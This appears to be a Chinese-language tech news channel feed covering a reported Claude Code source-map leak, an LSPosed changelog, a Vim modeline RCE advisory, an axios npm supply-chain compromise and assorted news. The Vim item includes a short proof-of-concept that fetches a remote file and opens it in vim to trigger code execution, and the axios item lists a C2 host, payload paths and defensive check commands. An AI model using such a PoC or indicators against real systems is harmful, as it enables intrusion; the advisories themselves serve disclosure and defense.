随机碎片 / 资讯文档 / 网站工具 / GitHub 项目 / Bing 壁纸
*-cli & *code: 感谢 claude code 大哥开源 ,马上开始新版本自研

* 前端工程中 .js.map 就是包含完整源代码 (甚至注释) 的项目映射,一般是用于 debug 的,而此次 Anthropic 发布 npm 包的时候直接不小心 (?) 把这个文件一起发出来了,属于是实习工都不会犯的问题


想了一下,如果黑客拿这份源代码尝试恶意利用 (例如找 0day) 的话就非常恐怖了,在 vibe coding 盛行的浪潮下所有人都会暴露在阴影之中

特别是今天还爆出了有人拿 claude 一句话找出 vim 0day RCE 的事... 要是 claude code 也因此爆出一车 1-click 甚至 0-click RCE 的话 真的是完全不敢想

更何况现在绝大部分人用 cc 等 vibe coding 工具的时候都是直接默认 accept all edit 甚至 --dangerously-skip-permissions 的?

src: https://www.npmjs.com/package/@anthropic-ai/claude-code/v/2.1.88?activeTab=code
自 v1.9.2 以来的主要更新:

新增
- 支持 Android 8.1 至 Android 17 Beta 3
- 新增完整的 libxposed API 101 支持
- 新增 miuix 版本管理器并默认启用
- 新增可按应用配置的还原内联钩子功能
- 新增对 libxposed 相关类启用 API 调用保护
- 新增安全模式
- 新增 action.sh 支持,可从 action.sh 打开管理器
- 重构 dex2oat 包装器,支持在 Android 12+ 重新优化系统框架
- 新增 16K page size 支持
- 支持注入系统自定义 resolver 的进程
- 支持重置作用域请求设置
- 支持将日志转发至守护进程

改进
- 大幅度增强对被注入的应用的隐藏能力
- 适配新版 Android 上的反射限制与部分系统行为变化
- 改进软件包与模块解析逻辑
- 优化管理器与服务之间的通信方式,加快启动速度
- 改进 LoadedApk、类初始化 Hook、native hook 的兼容性
- 改进 system_server 相关初始化、binder 发送、异步重试与重启恢复逻辑
- 支持注入使用系统自定义 resolver 的进程
- 改进日志系统,提供更丰富的上下文信息,例如 UID / PID
- 改进多用户支持

修复
- 修复作用域备份与恢复功能
- 修复与部分自带 LSPlant 的应用的兼容性问题
- 修复 XSharedPreferences 初始化、目录权限与目录缺失问题
- 修复部分 Hook 崩溃与稳定性问题
- 修复一些内存泄漏问题
- 修复自动取色、浏览器跳转、搜索、图标显示等多项 UI 问题
- 修复对部分 OEM 系统的多项兼容性问题
- 修复多用户、卸载后配置残留与恢复错乱问题
- 修复 system_server 重启后的状态恢复问题
- 修复目录权限错误和配置迁移异常
- 修复日志解析与打包中的一些问题
- 修复 RemoteFile 在重启后可能无法读取的问题

移除
- 移除桌面快捷方式,可通过通知、拨号盘或 action.sh 启动管理器
- 移除 Riru 支持
- 移除对 libxposed API 版本 100 的支持

Added
- Support for Android 8.1 through Android 17 Beta 3
- Full support for libxposed API 101
- Added a new MIUIX-based Manager and enabled it by default
- Added per-app restore inline hooks support
- Added API call protection for libxposed-related classes
- Added safe mode
- Added action.sh support, including opening the Manager from action.sh
- Refactored the dex2oat wrapper, with support for recompiling the system framework on Android 12+
- Added 16K page size support
- Added support for injecting processes that use a custom system resolver
- Added support for resetting scope request settings
- Added support for forwarding log to daemon process

Improved
- Significantly improved hiding for injected apps
- Adapted to reflection restrictions and system behavior changes on newer Android versions
- Improved package and module parsing logic
- Improved communication between the manager and the service, with faster startup
- Improved compatibility for LoadedApk handling, class initializer hooks, and native hooks
- Improved system_server initialization, binder delivery, async retries, and recovery after restarts
- Improved logging with rich context information such as UID and PID
- Improved multi-user support

Fixed
- Fixed scope backup and restore
- Fixed compatibility issues with some apps that bundle their own LSPlant
- Fixed XSharedPreferences initialization, directory permission, and missing-directory issues
- Fixed various hook-related crashes and stability issues
- Fixed several memory leak issues
- Fixed various UI issues including dynamic color, browser launch, search, and icon display
- Fixed multiple compatibility issues on some OEM ROMs
- Fixed multi-user issues, stale config after uninstall, and restore inconsistencies
- Fixed state recovery after system_server restarts
- Fixed directory permission errors and config migration issues
- Fixed several issues in log parsing and packaging
- Fixed cases where RemoteFile could become unreadable after reboot

Removed
- Removed desktop shortcuts; the Manager can now be opened via notification, dialer code, or action.sh
- Removed Riru support
- Removed support for libxposed API version 100
LSPosed-v2.0.1-7639-release.zip
10.9 MB
支持了 kimi 和 codex 2.13 和 3.7 并且开源了
也是通用的库,可以同步任何你想同步的。

https://github.com/yihong0618/bbtag
vim存在rce,打开文件即可触发

https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh

poc

vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc


漏洞还是claude发现的,prompt只有一句话

Somebody told me there is an RCE 0-day when you open a file. Find it.
Vim tabpanel modeline escape affects Vim < 9.2.0272
严重供应链攻击,axios 两个版本被投毒。

核心信息

| 项目         | 内容                                                                                              |
| ---------- | ----------------------------------------------------------------------------------------------- |
| 恶意版本       | axios@1.14.1 和 axios@0.30.4                                                                     |
| 攻击手法       | 劫持维护者 jasonsaayman 的 npm 账户,绕过 CI/CD 直接发布                                                       |
| 恶意依赖       | plain-crypto-js@4.2.1(伪装成 crypto-js,实际 drop RAT|
| C2 服务器     | sfrclak.com:8000 (IP: 142.11.206.73)                                                            |
| 平台 payload | macOS: /Library/Caches/com.apple.act.mond<br>Linux: /tmp/ld.py<br>Windows: %PROGRAMDATA%\wt.exe |

你需要做的

1. 立即检查
npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
ls node_modules/plain-crypto-js 2>/dev/null && echo "⚠️ 中招"
2. 如果命中
• 降级到安全版本:[email protected][email protected]
系统已受陷 → 从干净状态重建,轮换所有凭证(npm token、AWS 密钥、SSH、云凭证)
• 检查 RAT 持久化文件(见上表路径)
3. CI/CD 加固
npm ci --ignore-scripts  # 禁止 postinstall 脚本
iptables -A OUTPUT -d 142.11.206.73 -j DROP  # 屏蔽 C2

axios 周下载量 3 亿+,影响范围极大。检查完你的项目和CI/CD流水线。
前两天刚在夸 Firefox,他们在更新 149 的时候同步更新了 ToS,可以卖你的各种信息,用语十分宽泛甚至可能可以卖你的浏览记录

建议:Get the fuck out of Firefox and use LibreWolf or something better

https://goblin.band/notes/ak78rax5htqlh5qo

https://discuss.privacyguides.net/t/firefox-shares-browsing-data-and-other-unique-info-with-with-partners-service-providers-suppliers-and-contractors-including-cloudflare-and-google/36524
😁 OpenAI 搞了个官方的 Claude Code 插件 codex-plugin-cc,可以方便大家在 Claude Code 中去调用 Codex。
这是深入敌后发展根据地吗,后面 A% 应该不会也对等推出在 Codex 中 调用 Claude Code 的插件吧
https://github.com/openai/codex-plugin-cc GitHub - openai/codex-plugin-cc: Use Codex from Claude Code to review code or delegate tasks.
一觉醒来发生了什么 03月31日
#Daily

2026年3月31日
🌍资讯快读
1、郑丽文回应4月访陆:这是台湾主流民意的殷殷期盼
https://www.thepaper.cn/newsDetail_forward_32861357
2、黑龙江海林建筑坍塌事故救援结束,7人遇难
https://www.jiemian.com/article/14182789.html
3、丈夫婚内赠与“第三者”财产,法院认定违背公序良俗判决返还
https://www.thepaper.cn/newsDetail_forward_32860974
4、中国将在长江水下开高铁
https://www.thepaper.cn/newsDetail_forward_32860068
5、国航中朝航线恢复运行
https://www.jiemian.com/article/14180512.html

👬即刻镇小报
1、30岁上下的人,AI最是你们的机会。
https://m.okjike.com/originalPosts/69c949dec5a1d4e6493469c0
2、我每天会监测的健康数据
https://m.okjike.com/originalPosts/69c9f5dcc9f973544e74a232
3、编程,正在变成一件几乎不需要消耗专注力的事情。
https://m.okjike.com/originalPosts/69c903f9c5a1d4e6492e16c1
4、真正有价值的反馈,不是告诉你“应该更好”,而是准确指出你“为什么现在还不够好”
https://m.okjike.com/originalPosts/69c920d79fe7bd898ae3e48b

今日即刻镇小报内容来自 @张机 @小马宋 @Barret李靖 @姜旭 ,感谢以上即友的创作与分享。
🖼 地下天堂
#Bing_Wallpaper

地下天堂

天堂洞, 峰牙 - 格邦国家公园, 越南 (© Pakawat Thongcharoen/Getty Images)

4K | 1080P
Back to Top
OKHK